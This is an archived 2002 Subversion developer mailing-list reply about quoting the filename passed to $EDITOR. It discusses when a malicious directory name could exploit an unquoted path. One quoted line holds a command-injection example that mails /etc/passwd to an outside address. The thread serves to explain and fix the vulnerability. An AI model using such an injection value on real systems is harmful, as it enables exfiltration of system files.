[svn.haxx.se] · SVN Dev · SVN Users · SVN Org · TSVN Dev · TSVN Users · Subclipse Dev · Subclipse Users · this month's index

Re: [PATCH] Quote filename passed to $EDITOR

From: Karl Fogel <kfogel_at_newton.ch.collab.net>
Date: 2002-07-23 22:23:18 CEST

Scott Lamb <slamb@slamb.org> writes:
> I don't think that's likely because they would have to run the checkin
> from that directory. Hard not to notice a directory called "$(mail
> to-me@test.com < /etc/passwd; echo null)" if you just 'cd'd to it.

Indeed, if you've cd'd to it, you won't have this problem. It's only
if you run the command from some other (usually higher) directory,
passing the dangerous pathname as an argument.

To unsubscribe, e-mail: dev-unsubscribe@subversion.tigris.org
For additional commands, e-mail: dev-help@subversion.tigris.org
Received on Tue Jul 23 22:36:35 2002

This is an archived mail posted to the Subversion Dev mailing list.

This site is subject to the Apache Privacy Policy and the Apache Public Forum Archive Policy.